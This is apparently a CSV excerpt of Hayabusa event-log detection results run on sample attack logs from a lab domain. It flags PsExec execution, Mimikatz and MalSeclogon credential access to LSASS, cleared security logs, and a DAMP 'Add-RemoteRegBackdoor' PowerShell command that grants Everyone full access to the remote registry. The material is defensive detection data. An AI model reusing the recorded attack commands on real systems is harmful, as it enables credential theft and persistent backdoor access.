Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: 
\PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:17.757 +00:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 22:09:13.666 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:13.671 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:13.672 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:13.673 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x10e6e8f54,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:18.652 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:25.699 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:25.699 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 17:33:01.409 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.474 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.485 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.616 +00:00,MSEDGEWIN10,4624,info,,Logon Type 9 - 
NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.616 +00:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.616 +00:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.636 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.638 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,4688,critical,CredAccess,Suspicious LSASS Process 
Clone,,rules/sigma/process_creation_builtin/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-09 13:41:50.714 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" +2021-12-09 13:41:51.740 +00:00,fs03vuln.offsec.lan,4688,critical,Exec,SMB Relay Attack Tools,,rules/sigma/process_creation_builtin/proc_creation_win_tools_relay_attacks.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" +2021-12-09 18:50:47.980 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.333 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.958 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 
0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.958 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.958 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.005 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.052 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.052 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.052 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.099 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.146 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:51:16.683 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 19:54:03.261 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-RemoteRegBackdoor -ComputerName FS03 -Trustee 'S-1-1-0',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.261 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : ] Using trustee username 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.370 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Service"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""name='RemoteRegistry'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.370 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): 
name=""Message""; value=""[FS03] Attaching to remote registry through StdRegProv""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.370 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Namespace""; value=""root/default"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Meta_Class"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""__CLASS = 'StdRegProv'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.386 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.417 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 
(CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.417 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.435 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.435 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) 
PowerShell on source.evtx +2021-12-09 19:54:03.435 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.451 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 